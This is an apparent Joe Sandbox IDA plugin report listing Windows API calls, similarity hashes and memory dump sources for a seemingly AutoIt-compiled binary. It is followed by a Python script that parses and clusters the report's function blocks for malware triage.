Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: 766f67d9732bb679151f4ce1e2b927b3c197c07bcbd9fb6cb8d491df34aca4be
• Instruction ID: 13714902345787247ff9b9671d5af93abca79f880f7f5c112ea5075020de50c1
• Opcode Fuzzy Hash: 766f67d9732bb679151f4ce1e2b927b3c197c07bcbd9fb6cb8d491df34aca4be
• Instruction Fuzzy Hash: A6112570505A25BEDB2C8F118CA8EFBFBACFF06361F10862AF92456000D3706990E6F0
APIs
  • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
  • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00948E73
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: b3568d74bfed0fa385c10578205649d65ec89bfefbdbd7cde37d65ecbd0d5810
• Instruction ID: 7c6566c44e7b20f0fbd13da3e758a3b5e572a8b7c52d2d325967aec4162e99b2
• Opcode Fuzzy Hash: b3568d74bfed0fa385c10578205649d65ec89bfefbdbd7cde37d65ecbd0d5810
• Instruction Fuzzy Hash: EB01DEB1641218AB9B14FBB8CC52DFF776DFF42320B400A19F921A72E1EE355808D651
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
• Opcode ID: 0e29aa25ae425a6d381db4f3573eb2b3ffb8a515baa2a63515d9f9500d1b3f16
• Instruction ID: de17f73689dc6141cf9eee6867a0e7b4ee02953c7d26ba1e26ba788c8932f893
• Opcode Fuzzy Hash: 0e29aa25ae425a6d381db4f3573eb2b3ffb8a515baa2a63515d9f9500d1b3f16
• Instruction Fuzzy Hash: C201F9719042187EDB18CAA9C816FEEBBFCDB51301F00459AF552D21C1E879A6088BA0
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00948D6B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 372448540-1403004172
                                                                  • Opcode ID: ddd26f518ead0e62add3ab988f1969fff1500ef4055b17b9640ead70761aa98f
                                                                  • Instruction ID: ac5d2d374071e9768827f7d2ac9eaa373fbec58ca83fb6b638082dffac3f23bb
                                                                  • Opcode Fuzzy Hash: ddd26f518ead0e62add3ab988f1969fff1500ef4055b17b9640ead70761aa98f
                                                                  • Instruction Fuzzy Hash: 5A01B171B41108ABDB14EBA4C952EFF77ACEF15300F100419B905A32D1DE145A0892A2
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00948DEE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 372448540-1403004172
                                                                  • Opcode ID: e9b34b14d41f5ff7789d8928f09664bd9df91630b67a0d27b077c0264eda5497
                                                                  • Instruction ID: 0a0920331736e77baa6d848ee50cb5124b20adf558200274f103f2100729c56d
                                                                  • Opcode Fuzzy Hash: e9b34b14d41f5ff7789d8928f09664bd9df91630b67a0d27b077c0264eda5497
                                                                  • Instruction Fuzzy Hash: 2E018F71B46109ABDB15EAB8D992EFF77ACEF11300F100415F906A32D2DA254E08D2B2
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp
                                                                  • String ID: #32770
                                                                  • API String ID: 2292705959-463685578
                                                                  • Opcode ID: 7404c4960d2c2c71d4d8771fa02be56ebfd49413f4f31e21db9a133d2c9f2acd
                                                                  • Instruction ID: bbe737a96f7b6b03283360a7866aad85d0d41f009f4c055936d75824c1aa7858
                                                                  • Opcode Fuzzy Hash: 7404c4960d2c2c71d4d8771fa02be56ebfd49413f4f31e21db9a133d2c9f2acd
                                                                  • Instruction Fuzzy Hash: 68E09233A042282AD720DA99AC49BA7F7ACEB85B71F000166FD04D6051E960AA9587E0
                                                                  APIs
                                                                    • Part of subcall function 0092B314: _memset.LIBCMT ref: 0092B321
                                                                    • Part of subcall function 00910940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0092B2F0,?,?,?,008F100A), ref: 00910945
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,008F100A), ref: 0092B2F4
                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008F100A), ref: 0092B303
                                                                  Strings
                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0092B2FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                  • API String ID: 3158253471-631824599
                                                                  • Opcode ID: ecb0b4d5c0ab94c74658a5c6e190ea6ba7b46cf19081f167b8f71dbadf33d434
                                                                  • Instruction ID: 8667e363ec5c9e2c3223dc9555e4eb940b4ee11c64ca67fc85e02c37f4dc1527
                                                                  • Opcode Fuzzy Hash: ecb0b4d5c0ab94c74658a5c6e190ea6ba7b46cf19081f167b8f71dbadf33d434
                                                                  • Instruction Fuzzy Hash: 50E092702157158FD721DF68E9043467BE8FF40314F008A2CE456C7245EBB4D488CBA1
                                                                  APIs
                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00947C82
                                                                    • Part of subcall function 00913358: _doexit.LIBCMT ref: 00913362
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Message_doexit
                                                                  • String ID: AutoIt$Error allocating memory.
                                                                  • API String ID: 1993061046-4017498283
                                                                  • Opcode ID: 7753b3cf920d6a34302cb48a178e39971768c2e3fa8d6492e917f5f621b9b84f
                                                                  • Instruction ID: c8ce2c9ba84f1b250665e16fd33d95b8c87367192654d74212e145f00017709b
                                                                  • Opcode Fuzzy Hash: 7753b3cf920d6a34302cb48a178e39971768c2e3fa8d6492e917f5f621b9b84f
                                                                  • Instruction Fuzzy Hash: B1D0123238831C36D11532E96C07FDA69488B85B56F144416BB48995D349D249D152E9
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00931775
                                                                    • Part of subcall function 0096BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0093195E,?), ref: 0096BFFE
                                                                    • Part of subcall function 0096BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0096C010
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0093196D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                  • String ID: WIN_XPe
                                                                  • API String ID: 582185067-3257408948
                                                                  • Opcode ID: adf945743f65fa7e12b63164ca7ff8ded9f1f919b36f5169b8c16d50790f3c5f
                                                                  • Instruction ID: 4bb2dac10d97db2f751747ea8be40a1b14b83d44cb424510e70d2b9836c8b769
                                                                  • Opcode Fuzzy Hash: adf945743f65fa7e12b63164ca7ff8ded9f1f919b36f5169b8c16d50790f3c5f
                                                                  • Instruction Fuzzy Hash: 4BF0C97181810DDFDB15DBA1CA98AFCBBF8BB18305F580495E106B61A0D7759F84DF60
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009759AE
                                                                  • PostMessageW.USER32(00000000), ref: 009759B5
                                                                    • Part of subcall function 00955244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009552BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: f44624b9bac0eb7dd51ba1be62a9f5d57736cbbc8400e89fb1e8d8bd2e474e8c
                                                                  • Instruction ID: 2ef940aaef9ca99e61cf08334bdc31a0dcae125ef216a000506d6cf821cb7759
                                                                  • Opcode Fuzzy Hash: f44624b9bac0eb7dd51ba1be62a9f5d57736cbbc8400e89fb1e8d8bd2e474e8c
                                                                  • Instruction Fuzzy Hash: 71D0A932384300BAE264BB309C1BF932610BB40B00F000828B609AA0D0C8E0A800C794
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0097596E
                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00975981
                                                                    • Part of subcall function 00955244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009552BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: 3c351197f718f81fe0234e578bd097443b21454701b03c970ee5eee879b68a58
                                                                  • Instruction ID: c9651cf908829ff16f6e1e1981e01a54d57cb7904964f57bb3267bdfdbc103e0
                                                                  • Opcode Fuzzy Hash: 3c351197f718f81fe0234e578bd097443b21454701b03c970ee5eee879b68a58
                                                                  • Instruction Fuzzy Hash: 71D0C932798311B6E664BB709C2BFA76A14BB40B51F010829B659AA1D1D9E09840D794
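As an added triage aid, not part of the Joe Sandbox report or its tooling: the listing above repeats one block per function, and the Similarity fields are what make that repetition useful. Functions that share an API String ID are the same API-plus-string pattern (the two Shell_TrayWnd functions at 0097596E and 009759AE share 529655941-2988720461; the two SendMessageW functions at 00948D6B and 00948DEE share 372448540-1403004172). The script below parses a constructed excerpt in this flattened layout, clusters blocks by that ID, names the uMsg argument of the Send/PostMessageW calls where the report resolved it (0x180 is LB_ADDSTRING, 0x182 is LB_DELETESTRING, 0x111 is WM_COMMAND), and flags one false lead: the IsDebuggerPresent/OutputDebugStringW pair carrying the CAtlBaseModule string is the ATL runtime's own initialisation-failure path, so it should not be read as a sample-specific anti-debug check. The function names, the heuristics in triage(), and the sample text are this example's own assumptions.

```python
"""Parse the per-function APIs/Similarity blocks of a Joe Sandbox report and
cluster them by API String ID for triage (added example, not Joe Sandbox code)."""
import re
from collections import defaultdict

# Constructed excerpt in the flattened layout of the listing above (assumption:
# one bullet per line; the report's JSON/XML exports are not handled here).
SAMPLE = """\
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0097596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00975981
  • Part of subcall function 00955244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009552BC
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 3c351197f718f81fe0234e578bd097443b21454701b03c970ee5eee879b68a58
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009759AE
• PostMessageW.USER32(00000000), ref: 009759B5
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: f44624b9bac0eb7dd51ba1be62a9f5d57736cbbc8400e89fb1e8d8bd2e474e8c
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,008F100A), ref: 0092B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008F100A), ref: 0092B303
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: ecb0b4d5c0ab94c74658a5c6e190ea6ba7b46cf19081f167b8f71dbadf33d434
APIs
  • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00948D6B
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: ddd26f518ead0e62add3ab988f1969fff1500ef4055b17b9640ead70761aa98f
"""

# One API reference: Name.Module(args), ref: address   (args are optional, e.g. _memmove.LIBCMT)
CALL = r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
API_RE = re.compile(r"^• " + CALL)
SUBCALL_RE = re.compile(r"^• Part of subcall function (?P<caller>[0-9A-F]{8}): " + CALL)
SIM_RE = re.compile(r"^• (API ID|String ID|API String ID|Opcode ID|Instruction ID): (.*)$")
# Windows message numbers as they appear in the uMsg argument of Send/PostMessageW.
MSG_NAMES = {0x0111: "WM_COMMAND", 0x0180: "LB_ADDSTRING", 0x0182: "LB_DELETESTRING"}

def parse_report(text):
    """Split the flattened listing into blocks; each block starts at a bare 'APIs' line."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "subcalls": [], "sim": {}}
            blocks.append(cur)
        elif cur is not None:
            if m := SUBCALL_RE.match(line):
                cur["subcalls"].append(m.groupdict())
            elif m := API_RE.match(line):
                cur["apis"].append(m.groupdict())
            elif m := SIM_RE.match(line):
                cur["sim"][m.group(1)] = m.group(2)
    return blocks

def decode_messages(block):
    """Name the uMsg of direct Send/PostMessageW calls where the report resolved it."""
    found = []
    for call in block["apis"]:
        args = (call["args"] or "").split(",")
        if call["api"] in ("SendMessageW", "PostMessageW") and len(args) >= 2 \
                and re.fullmatch(r"[0-9A-F]{8}", args[1]):
            code = int(args[1], 16)
            found.append((call["ref"], MSG_NAMES.get(code, f"0x{code:04X}")))
    return found

def cluster_by_api_string_id(blocks):
    """Functions sharing an API String ID are the same API-plus-string pattern."""
    clusters = defaultdict(list)
    for b in blocks:
        if key := b["sim"].get("API String ID"):
            clusters[key].append(b["sim"].get("Opcode ID", "")[:12])
    return dict(clusters)

def triage(block):
    """Heuristic notes (this example's own, not the report's) for common false leads."""
    notes, s = [], block["sim"].get("String ID", "")
    apis = {c["api"] for c in block["apis"]}
    if "CAtlBaseModule" in s and "IsDebuggerPresent" in apis:
        notes.append("ATL runtime init failure path: library code, not sample-specific anti-debug")
    if s == "Shell_TrayWnd" and "PostMessageW" in apis:
        notes.append("messages the Explorer taskbar window; see decode_messages() for uMsg")
    return notes

if __name__ == "__main__":
    parsed = parse_report(SAMPLE)
    for key, members in cluster_by_api_string_id(parsed).items():
        print(f"{key}: {len(members)} function(s) {members}")
    for b in parsed:
        print(b["sim"].get("Opcode ID", "")[:12], decode_messages(b), triage(b))
```

Run against a full report, the cluster sizes separate library boilerplate (dozens of functions sharing one ID) from the handful of unique blocks worth opening in the disassembler; the decoded uMsg values turn opaque SendMessageW arguments into list-box operations, which matches the ComboBox$ListBox string the report already associates with those functions.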